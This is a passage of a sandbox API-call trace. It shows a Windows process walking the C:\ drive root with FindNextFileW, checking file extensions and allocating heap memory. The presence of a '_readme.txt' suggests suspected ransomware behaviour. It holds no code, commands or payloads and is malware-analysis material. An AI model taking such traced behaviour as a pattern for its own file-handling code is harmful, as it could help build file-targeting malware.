0x3aa8c20 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35773c0 | out: hHeap=0x2c0000) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.927] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3540150 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa8c20 | out: hHeap=0x2c0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.927] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.927] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.927] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x35312e8 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59da8 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f88 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3540150 | out: hHeap=0x2c0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.928] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.928] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.928] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.928] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe99ea380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe99ea380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3a5a700 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f10 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59da8 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f88 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35312e8 | out: hHeap=0x2c0000) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.928] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.929] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f88 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.929] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3ac8068 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59da8 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a050 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c68 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f10 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f88 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a700 | out: hHeap=0x2c0000) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f88 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.929] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.930] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17a076c0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x17a076c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x17a076c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.930] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f10 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.930] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3ac5b20 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59920 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59948 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59da8 | out: hHeap=0x2c0000) returned 1 [0173.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a050 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3237b8 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f88 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f10 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac8068 | out: hHeap=0x2c0000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f10 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.931] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3ce860, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e3ce860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3ce860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.931] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.931] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3ce860, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e3ce860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3ce860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.931] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.931] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: 